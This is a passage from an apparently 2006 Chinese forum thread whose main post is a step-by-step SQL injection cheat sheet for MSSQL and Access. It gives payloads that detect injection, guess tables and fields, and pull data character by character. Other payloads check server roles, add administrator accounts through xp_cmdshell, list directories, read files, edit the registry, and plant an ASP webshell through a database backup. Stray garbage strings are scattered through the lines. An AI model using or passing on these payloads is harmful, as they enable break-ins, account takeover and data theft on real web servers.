社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3788阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 Qp?+_<{  
  2.初步判断是否是mssql ;and user>0 , XR8qi~  
{vH8X(m  
  3.注入参数是字符'and [查询条件] and ''=' PJ.jgN(r  
pxC5a i  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' f 0#V^[%Q  
^R$dG[Qf  
  5.判断数据库系统 DtN6.9H2`  
h ,n!x:zy@  
  ;and (select count(*) from sysobjects)>0 mssql zF$wz1 %  
1&As:kv5I  
  ;and (select count(*) from msysobjects)>0 access >k jJq]A2  
CyU>S}t  
v;8XRR:  
lpM{@JC  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 Smu x&e  
~zX5}U<R  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 bDNd m-  
)gLasR.1  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Yt'o#"R)  
sg2C_]i,H  
  9.(1)猜字段的ascii值(access) &ivIv[LV  
eC39C2q\  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 =+L>^w#6=  
R{B~Now3  
  (2)猜字段的ascii值(mssql) U,S286  
|Wgab5D>V  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ?C{N0?[P-  
ZM.g +-9  
  10.测试权限结构(mssql) f$'D2o, O  
Y|~>(  
[)u(\nfGX  
F{+`F<r  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- OR9){qP  
$F%?l\7j  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ,m8*uCf  
"F}Ip&]hAG  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Oe!&Jma*>  
h:NXO'  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- !;a<E:  
i5"q1dRQ  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- iD`XD\.?  
mTgn}rXk  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- @ $R a  
;$Jvqq|T  
  ;and 1=(select IS_MEMBER('db_owner'));-- . gJKr  
4#9-Z6kOk  
jg8P4s  
Z#O3s:`  
  11.添加mssql和系统的帐户 _JDr?Kg  
PsnU5f)`  
  ;exec master.dbo.sp_addlogin username;-- C=cTj7Ub  
  ;exec master.dbo.sp_password null,username,password;-- ~] 2R+  
CQ[-Cp7  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 9R[','x  
$C/Gn~k 5  
  ;exec master.dbo.xp_cmdshell 'net user username password y|se^dn  
%R>S"  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- (ce NVo&  
zJ`(LnV  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- xW4+)F5P(  
Fm':sd)'X  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- dFFqs&cQ  
QR'g*Bro  
kDh(~nfj  
bYc qscW  
  12.(1)遍历目录 HWBom8u0  
5aNDW'z`f  
  ;create table dirs(paths varchar(100), id int) lg+g:o  
Sq,ty{j2%  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' Qg!*=<b  
zY+Et.lg]^  
  ;and (select top 1 paths from dirs)>0 3(&F.&C$$  
EYG E#C; d  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) B_2>Yt"  
Z B&Uhi  
Rp*t"HSaAW  
^nF$<#a  
  (2)遍历目录 jYz3(mM'J  
)}!'VIe^!  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- T7~v40jn|  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 AUde_ 1hi  
 )S;ps  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "r"An"  
~7a BeD  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构  &7&*As  
cx(F,?SbS  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 CF"3<*%x  
""^BW Re D  
{;DZ@2|  
Dys"|,F  
  13.mssql中的存储过程 2*YXm>|1  
pNFIO t:(  
  xp_regenumvalues 注册表根键, 子键 jt--w"|-r  
-RQQ|:O$  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 P;L Z!I  
MA# !<b('  
  xp_regread 根键,子键,键值名 sLp LY1X  
rC `s;w  
  ;exec xp_regread oJT@'{;*z  
s[4 !R&b  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 S(h*\we  
)\Q|}JV  
  xp_regwrite 根键,子键, 值名, 值类型, 值 H> iZVE  
{~g  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ,z )NKt#  
R}9jgB  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 2z# @:Q  
{Y%=/ba W  
  xp_regdeletevalue 根键,子键,值名 Ki6.'#%7  
NV4W2thYo  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >%dAqYi $  
[F[<2{FQF  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 }zxh:"#K  
5)NBM7h  
"mDrJTWa  
t~K!["g  
  14.mssql的backup创建webshell 4(GgaQFO?  
WCTW#<izm  
  use model `Kw8rG\]:  
RmV/wY  
  create table cmd(str image); kQlcT"R  
=w$"wzc  
  insert into cmd(str) values (''); %E7.$Gj%  
z2V8NUn  
  backup database model to disk='c:\l.asp'; HCkqh4  
$!!=fFX*y  
[<a%\:c m4  
c.A/{a  
  15.mssql内置函数 b\m( 0/x  
kdPm # $-  
  ;and (select @@version)>0 获得Windows的版本号 w!w _`7[  
6FIoWG"x  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa R bc2g"]  
FXEfD"  
  ;and (select user_name())>0 爆当前系统的连接用户 D K_v{R  
Ny7=-]N4{"  
  ;and (select db_name())>0 得到当前连接的数据库 nL 07^6(  
OVSq8?L  
&\` a5[  
QN&^LaB<T  
  16.简洁的webshell R&_\&:4f  
9OT4j Am  
  use model )TG0m= *  
LNxE-Dp  
  create table cmd(str image); ]l7\Zq  
)u/ ^aK53^  
  insert into cmd(str) values (''); AaC1 ||?R  
xj q7%R_,  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五